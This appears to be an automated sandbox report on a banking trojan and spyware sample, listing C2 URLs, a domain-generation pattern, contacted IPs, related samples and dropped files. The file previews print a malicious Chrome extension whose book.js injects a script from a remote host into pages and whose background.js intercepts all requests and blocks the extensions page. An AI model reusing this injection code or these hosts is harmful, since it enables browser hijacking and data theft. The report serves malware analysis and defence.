http://84cfba021a5a6662.xyz/info_old/e	false	Avira URL Cloud: safe	unknown
http://84cfba021a5a6662.xyz/info_old/w	false	Avira URL Cloud: safe	unknown
http://84cfba021a5a6662.xyz/info_old/r	false	Avira URL Cloud: safe	unknown
http://84cfba021a5a6662.xy/info_old/w	false	Avira URL Cloud: safe	unknown
http://84CFBA021A5A6662.xyz/info_old/ddd	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate	ecv37E8.tmp.9.dr	false		high
https://duckduckgo.com/chrome_newtab	Localwebdata1611970737633.2.dr	false		high
https://duckduckgo.com/ac/?q=	6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmp, Localwebdata1611970737633.2.dr	false		high
https://www.messenger.com/	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779	ecv37E8.tmp.9.dr	false		high
https://cvision.media.net/new/286x175/2/75/95/36/612b163a-ff7b-498a-bad2-3c52bbd2c504.jpg?v=9	ecv37E8.tmp.9.dr	false		high
https://cvision.media.net/new/286x175/2/57/35/144/83ebc513-f6d1-4e0e-a39a-bef975147e85.jpg?v=9	ecv37E8.tmp.9.dr	false		high
http://www.msn.com	ecv37E8.tmp.9.dr	false		high
http://www.nirsoft.net	1611970727133.exe, 00000009.00000002.280160399.0000000000198000.00000004.00000010.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://A5D4CE54CC78B3CA.xyz/	6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/__media__/js/util/nrrV9140.js	ecv37E8.tmp.9.dr	false		high
https://twitter.com/ookie:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://twitter.comsec-fetch-dest:	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f	ecv37E8.tmp.9.dr	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852	ecv37E8.tmp.9.dr	false		high
http://ocsp.pki.goog/gts1o1core0	ecv37E8.tmp.9.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/?ocid=iehp	ecv37E8.tmp.9.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3	ecv37E8.tmp.9.dr	false		high
http://crl.pki.goog/GTS1O1core.crl0	ecv37E8.tmp.9.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://images.outbrainimg.com/transform/v3/eyJpdSI6IjE4MmE0M2M0MDY3OGU1N2E4MjhkM2NjNDdlNGMzZmNkYjU1N	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://www.messenger.com	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://www.nirsoft.net/	1611970727133.exe, 1611970727133.exe.2.dr	false		high
http://ocsp.pki.goog/GTSGIAG30	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://84CFBA021A5A6662.xyz/	6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://www.instagram.com/	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	download_engine.dll.2.dr	false		high
http://www.xunlei.com/GET	download_engine.dll.2.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee	ecv37E8.tmp.9.dr	false		high
https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c	ecv37E8.tmp.9.dr	false		high
https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiN	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/origin:	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmp, Localwebdata1611970737633.2.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0	ecv37E8.tmp.9.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	ecv37E8.tmp.9.dr	false		high
https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml	ecv37E8.tmp.9.dr	false		high
https://contextual.media.net/	ecv37E8.tmp.9.dr	false		high
http://ocsp.pki.goog/gsr202	ecv37E8.tmp.9.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie	ecv37E8.tmp.9.dr	false		high
https://pki.goog/repository/0	ecv37E8.tmp.9.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://api.twitter.com/1.1/statuses/update.json	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9	ecv37E8.tmp.9.dr	false		high
http://www.msn.com/	ecv37E8.tmp.9.dr	false		high
https://upload.twitter.com/i/media/upload.json	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	N1yprTBBXs.exe, 00000000.00000002.268429575.0000000002C85000.00000004.00000040.sdmp, 6272167835D47591.exe, 00000002.00000003.287668875.0000000004150000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmp	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734	ecv37E8.tmp.9.dr	false		high
https://twitter.com/compose/tweetsec-fetch-mode:	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://84CFBA021A5A6662.xyz/info_old/w	6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	false		unknown
https://www.messenger.com/accept:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804	ecv37E8.tmp.9.dr	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3	ecv37E8.tmp.9.dr	false		high
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/48/nrrV18753.js	ecv37E8.tmp.9.dr	false		high
http://crl.pki.goog/gsr2/gsr2.crl0?	ecv37E8.tmp.9.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://84CFBA021A5A6662.xyz/info_old/g	6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	false		unknown
http://pki.goog/gsr2/GTSGIAG3.crt0)	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://feedback.googleusercontent.com	6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	false		high
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xunlei.com/	download_engine.dll.2.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0#	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingth	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	download_engine.dll.2.dr	false		high
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	ecv37E8.tmp.9.dr	false		high
https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js	ecv37E8.tmp.9.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf	ecv37E8.tmp.9.dr	false		high
https://duckduckgo.com/chrome_newtabH	6272167835D47591.exe, 00000002.00000003.288462252.00000000007E8000.00000004.00000001.sdmp	false		high
https://curl.haxx.se/docs/http-cookies.html	6272167835D47591.exe, 00000002.00000002.353010517.00000000034BF000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280539335.000000000344F000.00000004.00000001.sdmp	false		high
http://www.openssl.org/support/faq.html	download_engine.dll.2.dr	false		high
https://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_333%2Cw_311%2Cc_fill%2Cg_faces:aut	ecv37E8.tmp.9.dr	false		high
http://www.winimage.com/zLibDllresource://scrollbar_u_h.pngresource://scrollbar_d_h.pngresource://sc	N1yprTBBXs.exe	false		high
http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL	ecv37E8.tmp.9.dr	false	Avira URL Cloud: safe	unknown
https://www.instagram.comsec-fetch-mode:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/accounts/login/ajax/facebook/	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e	ecv37E8.tmp.9.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	N1yprTBBXs.exe	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	ecv37E8.tmp.9.dr	false		high
https://www.instagram.com/sec-fetch-site:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://twitter.comReferer:	6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://84CFBA021A5A6662.xyz/#y	6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.interestvideo.com/video1.php	6272167835D47591.exe, 00000004.00000002.280539335.000000000344F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/accept:	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://A5D4CE54CC78B3CA.xyz/t	6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/login/nonce/	6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	false		high
https://cvision.media.net/new/300x194/2/138/47/25/3b2da2d4-7a38-47c3-b162-f33e769f51f5.jpg?v=9	ecv37E8.tmp.9.dr	false		high
https://srtb.msn.com/auction?a=de-ch&b=623d43496a394c99b1336ff5cc139eb9&c=MSN&d=http%3A%2F%2Fwww.msn	ecv37E8.tmp.9.dr	false		high
http://www.youtube.com	6272167835D47591.exe	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.23.16	unknown	United States		13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	346123
Start date:	29.01.2021
Start time:	17:37:39
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 25s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	N1yprTBBXs.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal93.bank.troj.spyw.evad.winEXE@32/37@4/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 34.2% (good quality ratio 32.7%) Quality average: 82.3% Quality standard deviation: 26.4%
HCA Information:	Successful, ratio: 58% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 104.43.193.48, 104.42.151.234, 23.211.6.115, 23.210.248.85, 51.11.168.160, 2.20.142.209, 2.20.142.210, 51.103.5.159, 51.104.139.180, 92.122.213.194, 92.122.213.247, 20.54.26.129, 52.155.217.156 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.21.23.16	Cyfj6XGbkd.exe	Get hash	malicious	Browse	84CFBA021A5A6662.xyz/info_old/ddd
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	84CFBA021A5A6662.xyz/info_old/ddd
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	84CFBA021A5A6662.xyz/info_old/ddd

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
84CFBA021A5A6662.xyz	Cyfj6XGbkd.exe	Get hash	malicious	Browse	104.21.23.16
	N1yprTBBXs.exe	Get hash	malicious	Browse	172.67.208.74
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
84cfba021a5a6662.xyz	Cyfj6XGbkd.exe	Get hash	malicious	Browse	104.21.23.16
	N1yprTBBXs.exe	Get hash	malicious	Browse	172.67.208.74
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	Cyfj6XGbkd.exe	Get hash	malicious	Browse	104.21.23.16
	Royalmail-Shipment.xls	Get hash	malicious	Browse	172.67.1.225
	N1yprTBBXs.exe	Get hash	malicious	Browse	172.67.208.74
	Royalmail-Shipment.xls	Get hash	malicious	Browse	172.67.1.225
	PO#PDT28394209.exe	Get hash	malicious	Browse	172.67.176.199
	c8TrAKsz0T.exe	Get hash	malicious	Browse	104.21.47.75
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
	RddH6rLRfH.exe	Get hash	malicious	Browse	104.21.27.240
	Immuni.apk	Get hash	malicious	Browse	172.64.100.5
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
	UGPK60taH6.dll	Get hash	malicious	Browse	104.20.184.68
	4PDNbYK5fj.exe	Get hash	malicious	Browse	172.67.169.213
	pmTdQ57tvM.exe	Get hash	malicious	Browse	172.67.169.213
	7BtV39hziI.exe	Get hash	malicious	Browse	104.21.27.240
	dc4AaqW6Aa.exe	Get hash	malicious	Browse	104.21.27.240
	lAy87VNPiL.exe	Get hash	malicious	Browse	104.21.27.240
	97aa4Ywd9y.exe	Get hash	malicious	Browse	104.21.27.240
	wuRBlQt0Tz.exe	Get hash	malicious	Browse	172.67.169.213
	4GRuinub4a.exe	Get hash	malicious	Browse	172.67.169.213
	v8c1m9dW8G.exe	Get hash	malicious	Browse	172.67.169.213

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\MSI1983.tmp	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	N1yprTBBXs.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Cookies1611970726289 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.698304057893793
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
MD5:	3806E8153A55C1A2DA0B09461A9C882A
SHA1:	BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
SHA-256:	366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
SHA-512:	31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Cookies1611970737289 Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.698304057893793
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
MD5:	3806E8153A55C1A2DA0B09461A9C882A
SHA1:	BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
SHA-256:	366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
SHA-512:	31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\background.js Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	886
Entropy (8bit):	5.022683940423506
Encrypted:	false
SSDEEP:	24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
MD5:	FEDACA056D174270824193D664E50A3F
SHA1:	58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
SHA-256:	8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
SHA-512:	2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
Malicious:	false
Preview:	$(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\book.js Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	152
Entropy (8bit):	5.039480985438208
Encrypted:	false
SSDEEP:	3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
MD5:	30CBBF4DF66B87924C75750240618648
SHA1:	64AF3DD53D6DED500863387E407F876C89A29B9A
SHA-256:	D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
SHA-512:	8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
Malicious:	false
Preview:	(function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\icon.png Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1161
Entropy (8bit):	7.79271055262892
Encrypted:	false
SSDEEP:	24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
MD5:	5D207F5A21E55E47FCCD8EF947A023AE
SHA1:	3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
SHA-256:	4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
SHA-512:	38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
Malicious:	false
Preview:	.PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..\|z.Z_..b$...)...z.....\|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r]...... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:.......k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u\|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\icon48.png Download File
Process:	C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2235
Entropy (8bit):	7.880518016071819
Encrypted:	false
SSDEEP:	48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
